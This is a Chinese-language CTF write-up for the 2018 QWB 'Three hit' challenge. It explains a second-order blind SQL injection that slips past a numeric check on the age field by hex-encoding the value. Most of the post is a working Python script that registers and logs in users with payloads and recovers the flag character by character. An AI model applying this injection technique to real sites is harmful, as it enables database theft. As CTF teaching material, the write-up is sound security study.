Three hit

2018強網杯-Writeup /

進去后發現功能很少，猜測二次注入，發現username有正則限制，那么測試age，發現必須整數，這里可以用16進制繞過，測試一番后發現是個盲注

找了個腳本改了下

import requests
import binascii

url_register = "http://39.107.32.29:10000/index.php?func=register"
url_login = "http://39.107.32.29:10000/index.php?func=login"
result = '[*]result:'
for i in range(1, 65):
    for j in range(32, 127):
        age = "1223 or ascii(substr((select flag from flag limit 1),{0},1))={1}#".format(str(i), str(j))
        age = binascii.hexlify(bytes(age, 'utf8'))
        age = "0x" + str(age, "utf8")
        username = "pupiles{0}{1}".format(str(i), str(j))
        data = {
            "username": username,
            "password": "123456",
            "age": age
        }
        while True:
            try:
                resp1 = requests.post(url=url_register, data=data, allow_redirects=False)
                break
            except Exception as e:
                continue
        while True:
            try:
                resp2 = requests.post(url=url_login, data=data, allow_redirects=True)
                if "<a>123</a>" in resp2.text:
                    result += chr(j)
                    print(result)
                break
            except Exception as e:
                continue

盲注跑出flag

本文章首發在網安wangan.com 網站上。

GQQQy

資深作者 200 聲望

老年二進制選手，副業虛擬機

點贊

討論數量: 0

只看當前版本

暫無話題~